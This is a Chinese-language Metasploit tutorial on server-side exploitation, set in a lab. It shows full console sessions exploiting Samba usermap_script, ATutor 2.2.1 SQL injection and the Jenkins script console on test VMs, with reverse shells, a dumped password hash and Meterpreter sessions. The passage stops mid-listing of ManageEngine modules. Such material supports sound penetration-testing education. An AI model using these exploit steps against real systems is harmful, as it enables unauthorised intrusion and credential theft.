Metasploit渗透测试之服务端漏洞利用

简介

在之前的文章中,我们学习了目标的IP地址,端口,服务,操作系统等信息的收集。信息收集过程中最大的收获是服务器或系统的操作系统信息。这些信息对后续的渗透目标机器非常有用,因为我们可以快速查找系统上运行的服务和漏洞信息。这个过程有点复杂,但是有了这些信息可以很大程度减轻我们后续的工作。

每一个操作系统都存在一些缺陷。一旦漏洞被报告出来,漏洞利用程序开发也开始了。比如Windows,可以很快为漏洞或BUG开发补丁程序,并推送给用户更新。漏洞披露是一个严重的问题,特别是 0day 漏洞会对计算机行业造成严重破坏。0day 收到高度追捧,在市场上的价格可达 15000美元到1000000美元。漏洞被发现并被利用,但漏洞的披露取决于研究人员及其意图。

像微软、苹果和谷歌这样的知名企业会定期为他们的产品发布补丁,因为他们要为众多的用户负责。但在公司场景中,情况会变得更糟,由于涉及停机时间和确保业务连续性不受影响,服务器需要数周才能修补。因此,建议您更新或密切关注正在使用的操作系统中发现的任何最新漏洞。未修补的系统是黑客的最爱,因为他们会立即发动攻击,危及目标。因此,必须定期修补和更新操作系统。在文中,我们将重点讨论一些最流行的服务和操作系统中报告的漏洞。

在渗透测试的过程中,一旦目标操作系统的信息可用,渗透人员就开始寻找针对特定服务或操作系统漏洞的可利用程序。因此,本文将是我们深入了解目标服务器端漏洞的第一步。在这里将介绍一些使用广泛的windows操作系统和Linux操作系统。我们还将研究如何使用利用这些漏洞,并设置它们的参数,使它们能够在目标机器上执行。以及Metasploit框架中的攻击载荷(payloads)。

在对目标机器攻击利用之前,我们首先要知道一些关于攻击模块和攻击载荷的基础知识,比如如何设置参数等。

为了对目标进行漏洞利用攻击,首先需要扫描目标的端口和服务,一旦收集了足够多的信息,下一步就是选择相对应的漏洞利用程序对目标进行攻击。让我们来学习一些 msfconsole中的漏洞利用命令。

关于 msfconsole 和如何启动 msfconsole ,在我们之前的文章已经讲过了。

msfconsole 中,如果要查看帮助,可以直接输入 help 命令即可

msf5 > help                                                                  Core Commands                                                                
=============                                                                Command       Description                                                -------       -----------                                                ?             Help menu                                                  banner        Display an awesome metasploit banner                       cd            Change the current working directory                       color         Toggle color                                               connect       Communicate with a host                                    exit          Exit the console                                           get           Gets the value of a context-specific variable              getg          Gets the value of a global variable                        grep          Grep the output of another command                         help          Help menu                                                  history       Show command history                                       load          Load a framework plugin                                    quit          Exit the console                                           repeat        Repeat a list of commands                                  route         Route traffic through a session                            save          Saves the active datastores                                sessions      Dump session listings and display information about sessionset           Sets a context-specific variable to a value                setg          Sets a global variable to a value                          sleep         Do nothing for the specified number of seconds             spool         Write console output into a file as well the screen        threads       View and manipulate background threads      ....set RHOSTS fe80::3990:0000/110, ::1-::f0f0Target a block from a resolved domain name:set RHOSTS www.example.test/24
msf5 >

从输出结果来看,有许多的命令,你可能会被吓到。但之前我们已经了解了一些命令,比如数据库命令。现在我们将重点关注在漏洞利用阶段最有用的命令,并在过程中了解其他命令。

最有用的命令:search命令

msf5 > search -h
Usage: search [ options ] <keywords>OPTIONS:-h                Show this help information-o <file>         Send output to a file in csv format-S <string>       Search string for row filter-u                Use module if there is one resultKeywords:aka         :  Modules with a matching AKA (also-known-as) nameauthor      :  Modules written by this authorarch        :  Modules affecting this architecturebid         :  Modules with a matching Bugtraq IDcve         :  Modules with a matching CVE IDedb         :  Modules with a matching Exploit-DB IDcheck       :  Modules that support the 'check' methoddate        :  Modules with a matching disclosure datedescription :  Modules with a matching descriptionfull_name   :  Modules with a matching full namemod_time    :  Modules with a matching modification datename        :  Modules with a matching descriptive namepath        :  Modules with a matching pathplatform    :  Modules affecting this platformport        :  Modules with a matching portrank        :  Modules with a matching rank (Can be descriptive (ex: 'good') or numeric with comparison operators (ex: 'gte400'))ref         :  Modules with a matching refreference   :  Modules with a matching referencetarget      :  Modules affecting this targettype        :  Modules of a specific type (exploit, payload, auxiliary, encoder, evasion, post, or nop)Examples:search cve:2009 type:exploitmsf5 >

通过 search我们可以查找非常多的东西,包括模块,漏洞等等。

# 1、攻击Linux服务器

Linux是使用最为广泛的操作系统之一,在前面的章节中,我们学习了如何扫描可用服务和利用漏洞扫描器扫描查找目标漏洞。在本节中,我们将使用Metasploitable2作为靶机,我们将利用Samba服务漏洞对Linux目标机进行攻击。

首先,我们使用servives命令查找之前nmap的扫描结果,并过滤139445端口。

msf5 > services -c port,info -p 139,445 192.168.177.145           
Services                                                          
========                                                          host             port  info                                       
----             ----  ----                                       
192.168.177.145  139   Samba smbd 3.X - 4.X workgroup: WORKGROUP  
192.168.177.145  445   Samba smbd 3.X - 4.X workgroup: WORKGROUP  msf5 >                                                            

现在我们知道了目标Samba的版本信息,我们就可以去查找相对应的漏洞,然后使用search命令搜索可使用的攻击模块。

TIP:我们可以在通用漏洞披露(CVE)在线平台 https://www.cvedetails.com中找到有关Samba 3.0.20漏洞的细节。

通过 search命令过滤 CVE模块类型关键字即可找到可利用的攻击模块。

msf5 > search cve:2007 type:exploit sambaMatching Modules
================#  Name                                       Disclosure Date  Rank       Check  Description-  ----                                       ---------------  ----       -----  -----------1  exploit/linux/samba/lsa_transnames_heap    2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow2  exploit/multi/samba/usermap_script         2007-05-14       excellent  No     Samba "username map script" Command Execution3  exploit/osx/samba/lsa_transnames_heap      2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow4  exploit/solaris/samba/lsa_transnames_heap  2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflowmsf5 >
# 利用过程

1、选择攻击模块

msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) >

2、运行info可查看模块信息

msf5 exploit(multi/samba/usermap_script) > infoName: Samba "username map script" Command ExecutionModule: exploit/multi/samba/usermap_scriptPlatform: UnixArch: cmdPrivileged: YesLicense: Metasploit Framework License (BSD)Rank: ExcellentDisclosed: 2007-05-14
......
Description:This module exploits a command execution vulnerability in Sambaversions 3.0.20 through 3.0.25rc3 when using the non-default"username map script" configuration option. By specifying a usernamecontaining shell meta characters, attackers can execute arbitrarycommands. No authentication is needed to exploit this vulnerabilitysince this option is used to map usernames prior to authentication!
References:https://cvedetails.com/cve/CVE-2007-2447/OSVDB (34700)http://www.securityfocus.com/bid/23972http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534http://samba.org/samba/security/CVE-2007-2447.htmlmsf5 exploit(multi/samba/usermap_script) >

通过模块描述信息,可用看出,该模块利用Samba 3.0.203.0.25rc中的命令执行漏洞。我们来试试。

3、配置参数

通过show missing命令,查看必须要配置的参数

msf5 exploit(multi/samba/usermap_script) > show missingModule options (exploit/multi/samba/usermap_script):Name    Current Setting  Required  Description----    ---------------  --------  -----------RHOSTS                   yes       The target address range or CIDR identifiermsf5 exploit(multi/samba/usermap_script) >

TIP:要显示模块的高级选项,你可以使用show advanced 命令

这里只需要我们设置目标的IP地址即可,我们通过set [options] [value]来设置

msf5 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.177.145
RHOSTS => 192.168.177.145
msf5 exploit(multi/samba/usermap_script) >

4、攻击

执行exploit即可。

msf5 exploit(multi/samba/usermap_script) > exploit[*] Started reverse TCP double handler on 192.168.177.143:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 48vnI4nfAB1GTD5d;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "48vnI4nfAB1GTD5d\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.177.143:4444 -> 192.168.177.145:51353) at 2019-04-26 13:14:08 +0800

攻击成功后,我们将获得与目标机器的连接会话。我们可用执行一些命令,来验证是否获得了目标机器的权限。

hostname                                                                                         
metasploitable                                                                                   
ip a show                                                                                        
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue                                            link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00                                        inet 127.0.0.1/8 scope host lo                                                               inet6 ::1/128 scope host                                                                     valid_lft forever preferred_lft forever                                                   
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000                   link/ether 00:0c:29:cc:9a:ea brd ff:ff:ff:ff:ff:ff                                           inet 192.168.177.145/24 brd 192.168.177.255 scope global eth0                                inet6 fe80::20c:29ff:fecc:9aea/64 scope link                                                 valid_lft forever preferred_lft forever                                                   
3: eth1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop qlen 1000                                     link/ether 00:0c:29:cc:9a:f4 brd ff:ff:ff:ff:ff:ff                                           
id
uid=0(root) gid=0(root)  

Ctrl+Z可将会话转到后台

uid=0(root) gid=0(root)
^Z  //按 Ctrl+Z
Background session 1? [y/N]  y
msf5 exploit(multi/samba/usermap_script) >

5、要操作会话,可用使用sessions命令

msf5 exploit(multi/samba/usermap_script) > sessions -h
Usage: sessions [options] or sessions [id]Active session manipulation and interaction.OPTIONS:-C <opt>  Run a Meterpreter Command on the session given with -i, or all-K        Terminate all sessions-S <opt>  Row search filter.-c <opt>  Run a command on the session given with -i, or all-d        List all inactive sessions-h        Help banner-i <opt>  Interact with the supplied session ID-k <opt>  Terminate sessions by session ID and/or range-l        List all active sessions-n <opt>  Name or rename a session by ID-q        Quiet mode-s <opt>  Run a script or module on the session given with -i, or all-t <opt>  Set a response timeout (default: 15)-u <opt>  Upgrade a shell to a meterpreter session on many platforms-v        List all active sessions in verbose mode-x        Show extended information in the session tableMany options allow specifying session ranges using commas and dashes.
For example:  sessions -s checkvm -i 1,3-5  or  sessions -k 1-2,5,6msf5 exploit(multi/samba/usermap_script) >

6、要重新回到刚才的会话,可使用sessions -i [session_id]命令,使用sessions -l可查看所有激活的会话列表。

msf5 exploit(multi/samba/usermap_script) > sessions -lActive sessions
===============Id  Name  Type            Information  Connection--  ----  ----            -----------  ----------1         shell cmd/unix               192.168.177.143:4444 -> 192.168.177.145:51353 (192.168.177.145)msf5 exploit(multi/samba/usermap_script) > sessions -i 1
[*] Starting interaction with 1...id
uid=0(root) gid=0(root)
ip a show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueuelink/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host loinet6 ::1/128 scope hostvalid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000link/ether 00:0c:29:cc:9a:ea brd ff:ff:ff:ff:ff:ffinet 192.168.177.145/24 brd 192.168.177.255 scope global eth0inet6 fe80::20c:29ff:fecc:9aea/64 scope linkvalid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop qlen 1000link/ether 00:0c:29:cc:9a:f4 brd ff:ff:ff:ff:ff:ff

要终止会话,可用按Ctrl+c

    link/ether 00:0c:29:cc:9a:f4 brd ff:ff:ff:ff:ff:ff
^C  //Ctrl+C 
Abort session 1? [y/N]  y //输入 y
""[*] 192.168.177.145 - Command shell session 1 closed.  Reason: User exit
msf5 exploit(multi/samba/usermap_script) >
# 漏洞原理

Samba是用于LinuxWindows之间的打印和文件共享的服务。Samba 3.0.03.0.25rc3smbd中的MS-RPC功能允许远程攻击者通过SamrChangePassword功能的shell元字符执行任意命令,当启用smb.conf中“用户名映射脚本”选项时(不是默认启用的),允许远程认证的用户通过远程打印机中的其他MS-RPC功能的外部元字符执行命令,以及文件共享管理。该漏洞攻击模块通过指定一个用户名包含shell元字符,攻击者可以执行任意命令。 因为此选项用于在身份验证之前映射用户名,所以不需要身份验证就可以利用此漏洞。

# 指定有效攻击载荷

我们没有指定payload,所以Metasploit默认为我们指定了payload。我们可用show options查看

msf5 exploit(multi/samba/usermap_script) > show options                                    Module options (exploit/multi/samba/usermap_script):                                       Name    Current Setting  Required  Description                                          ----    ---------------  --------  -----------                                          RHOSTS  192.168.177.145  yes       The target address range or CIDR identifier          RPORT   139              yes       The target port (TCP)                                Payload options (cmd/unix/reverse):                                                        Name   Current Setting  Required  Description                                           ----   ---------------  --------  -----------                                           LHOST  192.168.177.143  yes       The listen address (an interface may be specified)    LPORT  4444             yes       The listen port                                       Exploit target:                                                                            Id  Name                                                                                --  ----                                                                                0   Automatic                                                                           msf5 exploit(multi/samba/usermap_script) >                                                 

可以看到,使用的payload是一个unix反向shell

我们可以通过show payloas列出当前攻击模块所有可用的攻击载荷。

msf5 exploit(multi/samba/usermap_script) > show payloadsCompatible Payloads
===================#   Name                                Disclosure Date  Rank    Check  Description-   ----                                ---------------  ----    -----  -----------1   cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)2   cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)3   cmd/unix/bind_inetd                                  normal  No     Unix Command Shell, Bind TCP (inetd)4   cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)5   cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)6   cmd/unix/bind_netcat_gaping                          normal  No     Unix Command Shell, Bind TCP (via netcat -e)7   cmd/unix/bind_netcat_gaping_ipv6                     normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv68   cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)9   cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv610  cmd/unix/bind_r                                      normal  No     Unix Command Shell, Bind TCP (via R)11  cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)12  cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv613  cmd/unix/bind_socat_udp                              normal  No     Unix Command Shell, Bind UDP (via socat)14  cmd/unix/bind_zsh                                    normal  No     Unix Command Shell, Bind TCP (via Zsh)15  cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution16  cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)17  cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)18  cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)19  cmd/unix/reverse_ksh                                 normal  No     Unix Command Shell, Reverse TCP (via Ksh)20  cmd/unix/reverse_lua                                 normal  No     Unix Command Shell, Reverse TCP (via Lua)21  cmd/unix/reverse_ncat_ssl                            normal  No     Unix Command Shell, Reverse TCP (via ncat)22  cmd/unix/reverse_netcat                              normal  No     Unix Command Shell, Reverse TCP (via netcat)23  cmd/unix/reverse_netcat_gaping                       normal  No     Unix Command Shell, Reverse TCP (via netcat -e)24  cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)25  cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)26  cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)27  cmd/unix/reverse_php_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via php)28  cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)29  cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)30  cmd/unix/reverse_r                                   normal  No     Unix Command Shell, Reverse TCP (via R)31  cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)32  cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)33  cmd/unix/reverse_socat_udp                           normal  No     Unix Command Shell, Reverse UDP (via socat)34  cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)35  cmd/unix/reverse_zsh                                 normal  No     Unix Command Shell, Reverse TCP (via Zsh)msf5 exploit(multi/samba/usermap_script) >

我们还可以通过sessions -u [sessions_id] 可以将shell会话升级成meterpreter会话,从而可以利用meterpreter的高级功能。关于meterpreter会在后续的章节中详细讲解。

msf5 exploit(multi/samba/usermap_script) > sessions -u 2
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [2][*] Upgrading session ID: 2
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.177.143:4433
[*] Sending stage (985320 bytes) to 192.168.177.145
[*] Meterpreter session 3 opened (192.168.177.143:4433 -> 192.168.177.145:35189) at 2019-04-26 13:46:35 +0800
[*] Command stager progress: 100.00% (773/773 bytes)
# 2、SQL 注入

Metasploit有几个SQL注入漏洞的利用模块,使我们能够测试和验证目标是否易受攻击。

# 靶机配置

我们将安装一个易受攻击的开源LMS:Atutor 2.2.1进行测试,访问ATutor 2.2.1 - SQL Injection / Remote Code Execution (Metasploit) - PHP remote Exploit ,点击VULNERABLE APP旁边的下载按钮开源下载Atutor 2.2.1

TIP:至于怎么安装 ATutor,可以查看官方文档。

# 利用过程

该模块利用了ATutor 2.2.1SQL注入漏洞和身份验证漏洞,这意味着我们可以绕过身份验证,访问管理接口,上传恶意代码。

1、使用exploit/multi/http/atutor_sqli模块,查看模块选项

msf5 > use  exploit/multi/http/atutor_sqli
msf5 exploit(multi/http/atutor_sqli) > show optionsModule options (exploit/multi/http/atutor_sqli):Name       Current Setting  Required  Description----       ---------------  --------  -----------Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]RHOSTS                      yes       The target address range or CIDR identifierRPORT      80               yes       The target port (TCP)SSL        false            no        Negotiate SSL/TLS for outgoing connectionsTARGETURI  /ATutor/         yes       The path of AtutorVHOST                       no        HTTP server virtual hostExploit target:Id  Name--  ----0   Automaticmsf5 exploit(multi/http/atutor_sqli) >

2、攻击之前,可以通过check命令检测目标是否易受攻击。然后进行攻击

msf5 exploit(multi/http/atutor_sqli) > check
[+] 192.168.177.139:80 - The target is vulnerable.
msf5 exploit(multi/http/atutor_sqli) >
msf5 exploit(multi/http/atutor_sqli) > exploit[*] Started reverse TCP handler on 192.168.177.143:4444
[*] 192.168.177.139:80 - Dumping the username and password hash...
[*] Started reverse TCP handler on 192.168.177.143:4444
[*] 192.168.177.139:80 - Dumping the username and password hash...
[+] 192.168.177.139:80 - Got the root's hash: 9c352326223a09bc610ff4919e611bed3fbb28f5 !
[*] Sending stage (38247 bytes) to 192.168.177.139
[*] Meterpreter session 13 opened (192.168.177.143:4444 -> 192.168.177.139:50088) at 2019-04-28 13:53:36 +0800
[!] This exploit may require manual cleanup of 'ytux.php' on the target
[!] This exploit may require manual cleanup of '/var/content/module/zyq/ytux.php' on the targetmeterpreter >

根据密码复杂度不同,所需时长也不同。攻击成功后,获取了shell

meterpreter > getuid
Server username: Administrator (0)
meterpreter > sysinfo
Computer    : WIN-BGKRU85VR4H
OS          : Windows NT WIN-BGKRU85VR4H 6.1 build 7600 (Windows 7 Business Edition) i586
Meterpreter : php/windows
meterpreter >
# 3、msf shell类型

在进行下节内容的学习之前,我们先来讨论一下可用的shell的类型。shell大体上分为两种,一种是bind shell一种是reverse shjell

bindshell 又叫正向连接shell。是指程序在目标机本地端口上监听,允许攻击者连接到监听端口。bind shell 非常适合本地漏洞,比如当你已经通过钓鱼攻击成功危害了目标计算机,并希望利用本地服务提权的时候。但是它不适合远程攻击场景。因为通常来说目标位于防火墙后面。

所以大部分时候,我们更多的使用reverse shell,又称反向shell作为我们的有效攻击载荷。反向shell是在攻击者上监听端口,攻击程序在目标机上运行后主动连接到攻击者监听的端口。由于防火墙大多数时候只限制入站规则。因此反向shell更容易绕过防火墙。

Payloads

Metasploit中由三种不同类型的payload模块,分别是:singlesstagersstages

Singles:独立载荷,可直接植入目标系统并执行的程序,比如 shell_bind_tcp

Stagers:传输器载荷,负责建立网络连接,与stages载荷配合使用。这种载荷体积小且可靠

Stages:传输体载荷,在stagers建立好稳定的连接之后,提供的高级功能。如 shell,meterpreter, dllinject, patchupdllinject, upexec,vncinject等。metasploitmeterpreter其实就是一个payload。它需stagersstages配合使用。

在上一节中的SQL注入中,已经获得一个有效的漏洞利用。所以我们将使用它来测试不同类型的payload

# 利用过程

1、使用show payloads命令显示可用的载荷。

msf5 exploit(multi/http/atutor_sqli) > show payloadsCompatible Payloads
===================#   Name                     Disclosure Date  Rank    Check  Description-   ----                     ---------------  ----    -----  -----------1   generic/custom            normal  No     Custom Payload2   generic/shell_bind_tcp    normal  No     Generic Command Shell, Bind TCP Inline3   generic/shell_reverse_tcp normal  No     Generic Command Shell, Reverse TCP Inline4   php/bind_perl             normal  No     PHP Command Shell, Bind TCP (via Perl)5   php/bind_perl_ipv6        normal  No     PHP Command Shell, Bind TCP (via perl) IPv66   php/bind_php              normal  No     PHP Command Shell, Bind TCP (via PHP)7   php/bind_php_ipv6         normal  No     PHP Command Shell, Bind TCP (via php) IPv68   php/download_exec         normal  No     PHP Executable Download and Execute9   php/exec                  normal  No     PHP Execute Command10  php/meterpreter/bind_tcp  normal  No     PHP Meterpreter, Bind TCP Stager11  php/meterpreter/bind_tcp_ipv6 normal  No     PHP Meterpreter, Bind TCP Stager IPv612  php/meterpreter/bind_tcp_ipv6_uuid normal No PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support13  php/meterpreter/bind_tcp_uuid normal  No  PHP Meterpreter, Bind TCP Stager with UUID Support14  php/meterpreter/reverse_tcp normal  No     PHP Meterpreter, PHP Reverse TCP Stager15  php/meterpreter/reverse_tcp_uuid normal  No PHP Meterpreter, PHP Reverse TCP Stager16  php/meterpreter_reverse_tcp  normal  No     PHP Meterpreter, Reverse TCP Inline17  php/reverse_perl        normal  No     PHP Command, Double Reverse TCP Connection (via Perl)18  php/reverse_php            normal  No     PHP Command Shell, Reverse TCP (via PHP)msf5 exploit(multi/http/atutor_sqli) >

2、查看载荷的详细信息,使用info <payload>指令

msf5 exploit(multi/http/atutor_sqli) > info payload/generic/shell_bind_tcp                         Name: Generic Command Shell, Bind TCP Inline                                                       Module: payload/generic/shell_bind_tcp                                                              Platform: All                                                                                       Arch: x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, p
hp, java, ruby, dalvik, python, nodejs, firefox, zarch, r                                                                                                         
Needs Admin: No                                                                                                                                                   Total size: 0                                                                                     Rank: Normal                                                                                                                                               
Provided by:                                                                                                                                                      skape <mmiller@hick.org>                                                                                                                                        
Basic options:                                                                                                                                                    
Name   Current Setting  Required  Description                                                                                                                     
----   ---------------  --------  -----------                                                                                                                     
LPORT  4444             yes       The listen port                                                                                                                 
RHOST                   no        The target address                                                                                                              
Description:                                                                                                                                                      Listen for a connection and spawn a command shell                                                                                                               
msf5 exploit(multi/http/atutor_sqli) >                                                                                                                            

3、generic/shell_bind_tcp是一个独立载荷。要选择它作为有效载荷,我们使用set payload <payload_name>

msf5 exploit(multi/http/atutor_sqli) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
msf5 exploit(multi/http/atutor_sqli) > exploit[*] 192.168.177.139:80 - Dumping the username and password hash...

4、使用 generic/shell_bind_tcp载荷可用得到一个通用的shell,但远远不够,PHP Meterprete是一个特性丰富且更高级的载荷,我们可以用它来利用此漏洞。

msf5 exploit(multi/http/atutor_sqli) > info payload/php/meterpreter/reverse_tcpName: PHP Meterpreter, PHP Reverse TCP StagerModule: payload/php/meterpreter/reverse_tcpPlatform: PHPArch: php
Needs Admin: NoTotal size: 1101Rank: NormalProvided by:egypt <egypt@metasploit.com>Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address (an interface may be specified)
LPORT  4444             yes       The listen portDescription:Run a meterpreter server in PHP. Reverse PHP connect back stagerwith checks for disabled functionsmsf5 exploit(multi/http/atutor_sqli) >
msf5 exploit(multi/http/atutor_sqli) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf5 exploit(multi/http/atutor_sqli) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
[*] Started reverse TCP handler on 192.168.177.143:4444
[*] 192.168.177.139:80 - Dumping the username and password hash...
[+] 192.168.177.139:80 - Got the root's hash: 9c352326223a09bc610ff4919e611bed3fbb28f5 !
[*] Sending stage (38247 bytes) to 192.168.177.139
[*] Meterpreter session 14 opened (192.168.177.143:4444 -> 192.168.177.139:51063) at 2019-04-28 16:42:49 +0800
[!] This exploit may require manual cleanup of 'bgxx.php' on the target
[!] This exploit may require manual cleanup of '/var/content/module/glt/bgxx.php' on the targetmeterpreter >
[+] 192.168.177.139:80 - Deleted bgxx.php
meterpreter > getuid
Server username: Administrator (0)
meterpreter > sysinfo
Computer    : WIN-BGKRU85VR4H
OS          : Windows NT WIN-BGKRU85VR4H 6.1 build 7600 (Windows 7 Business Edition) i586
Meterpreter : php/windows
meterpreter >
# 4、攻击Windows 服务器

利用之前收集的信息,我们将对Windows服务器作为目标进行漏洞利用。本节我们将使用Metasploitable3作为靶机。

# 利用过程

通过前期收集的信息,查找漏洞,选择合适的漏洞里利用模块。

使用services查看目标Apache服务版本。

msf5 > services -p 8020 192.168.177.144
Services
========host             port  proto  name  state  info
----             ----  -----  ----  -----  ----
192.168.177.144  8020  tcp    http  open   Apache httpdmsf5 >

访问目标站点

通过浏览目标站点,我们可以尝试使用弱口令进行登录,比如 admin

居然登录进去了。

1、查看运行在 8484端口的 Jenkins-CI服务。

msf5 > services 192.168.177.144 -p 8484
Services
========host             port  proto  name  state  info
----             ----  -----  ----  -----  ----
192.168.177.144  8484  tcp    http  open   Jetty winstone-2.8

这里,并没有显示 Jenkins,浏览器访问看看

确实是一个 Jenkins服务

我们使用search jenkins搜索可利用的模块

msf5 > search jenkins                                                                                 
Matching Modules                                                                                                                                                
================                                                                                                                                                #   Name                                                  Disclosure Date  Rank       Check  Description                                                     -   ----                                                  ---------------  ----       -----  -----------                                                     1   auxiliary/gather/jenkins_cred_recovery                                 normal     Yes    Jenkins Domain Credential Recovery                              2   auxiliary/scanner/http/jenkins_command                                 normal     Yes    Jenkins-CI Unauthenticated Script-Console Scanner               3   auxiliary/scanner/http/jenkins_enum                                    normal     Yes    Jenkins-CI Enumeration                                          4   auxiliary/scanner/http/jenkins_login                                   normal     Yes    Jenkins-CI Login Utility                                        5   auxiliary/scanner/jenkins/jenkins_udp_broadcast_enum                   normal     No     Jenkins Server Broadcast Enumeration                            6   exploit/linux/misc/jenkins_java_deserialize           2015-11-18       excellent  Yes    Jenkins CLI RMI Java Deserialization Vulnerability              7   exploit/linux/misc/jenkins_ldap_deserialize           2016-11-16       excellent  Yes    Jenkins CLI HTTP Java Deserialization Vulnerability             8   exploit/linux/misc/opennms_java_serialize             2015-11-06       normal     No     OpenNMS Java Object Unserialization Remote Code Execution       9   exploit/multi/http/jenkins_metaprogramming            2019-01-08       excellent  Yes    Jenkins ACL Bypass and Metaprogramming RCE                      10  exploit/multi/http/jenkins_script_console             2013-01-18       good       Yes    Jenkins-CI Script-Console Java Execution                        11  exploit/multi/http/jenkins_xstream_deserialize        2016-02-24       excellent  Yes    Jenkins XStream Groovy classpath Deserialization Vulnerability  12  exploit/windows/misc/ibm_websphere_java_deserialize   2015-11-06       excellent  No     IBM WebSphere RCE Java Deserialization Vulnerability            13  post/multi/gather/jenkins_gather                                       normal     No     Jenkins Credential Collector                                                                                                                                 
msf5 >                                                                                                                                                          

使用Jenkins-CI Script-Console Java Execution模块

msf5 > use  exploit/multi/http/jenkins_script_console
msf5 exploit(multi/http/jenkins_script_console) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 exploit(multi/http/jenkins_script_console) > set RPORT 8484
RPORT => 8484
msf5 exploit(multi/http/jenkins_script_console) > set TARGETURI /
TARGETURI => /
msf5 exploit(multi/http/jenkins_script_console) > exploit[*] Started reverse TCP handler on 192.168.177.143:4444
[*] Checking access to the script console
[*] No authentication required, skipping login...
[*] 192.168.177.144:8484 - Sending command stager...
[*] Command Stager progress -   2.06% done (2048/99626 bytes)
[*] Command Stager progress -   4.11% done (4096/99626 bytes)
[*] Command Stager progress -   6.17% done (6144/99626 bytes)
....
[*] Command Stager progress -  98.67% done (98304/99626 bytes)
[*] Command Stager progress - 100.00% done (99626/99626 bytes)
[*] Sending stage (179779 bytes) to 192.168.177.144
[*] Meterpreter session 2 opened (192.168.177.143:4444 -> 192.168.177.144:49555) at 2019-04-26 17:32:58 +0800meterpreter > sysinfo
Computer        : METASPLOITABLE3
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE
meterpreter >

攻击ManageEngine Desktop Central 9


msf5 exploit(multi/http/jenkins_script_console) > search type:exploit ManageengineMatching Modules
================#   Name                                                     Disclosure Date  Rank       Check  Description-   ----                                                     ---------------  ----       -----  -----------1   exploit/multi/http/eventlog_file_upload                  2014-08-31       excellent  Yes    ManageEngine Eventlog Analyzer Arbitrary File Upload2   exploit/multi/http/manage_engine_dc_pmp_sqli             2014-06-08       excellent  Yes    ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection3   exploit/multi/http/manageengine_auth_upload              2014-12-15       excellent  Yes    ManageEngine Multiple Products Authenticated File Upload4   exploit/multi/http/manageengine_sd_uploader              2015-08-20       excellent  Yes    ManageEngine ServiceDesk Plus Arbitrary File Upload5   exploit/multi/http/manageengine_search_sqli              2012-10-18       excellent  Yes    ManageEngine Security Manager Plus 5.5 Build 5505 SQL Injection6   exploit/multi/http/opmanager_socialit_file_upload        2014-09-27       excellent  Yes    ManageEngine OpManager and Social IT Arbitrary File Upload7   exploit/windows/http/desktopcentral_file_upload          2013-11-11       excellent  Yes    ManageEngine Desktop Central 